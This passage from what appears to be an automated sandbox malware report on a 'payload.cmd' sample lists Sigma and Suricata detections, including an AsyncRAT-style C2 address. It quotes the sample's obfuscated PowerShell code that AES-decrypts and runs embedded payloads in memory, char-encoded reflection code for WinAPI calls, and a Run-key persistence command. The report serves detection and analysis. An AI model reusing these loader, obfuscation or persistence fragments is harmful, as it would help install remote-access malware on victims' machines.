'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBz

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+'

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+'

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 1788, ProcessName: schtasks.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2064, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5760, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2064, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5760, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 1796, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 2064, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T14:55:08.393977+0200	2035595	1	Domain Observed Used for C2 Detected	154.216.20.132	6969	192.168.2.7	49719	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 38_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

38_2_00401000

Source: unknown

HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2

Source:	Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr

Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEED894 FindFirstFileExW,	20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1D894 FindFirstFileExW,	20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1D894 FindFirstFileExW,	21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783D894 FindFirstFileExW,	40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922D894 FindFirstFileExW,	41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942D894 FindFirstFileExW,	41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1ED894 FindFirstFileExW,	42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21D894 FindFirstFileExW,	42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5D894 FindFirstFileExW,	43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92D894 FindFirstFileExW,	44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_0000022F4B95DA18
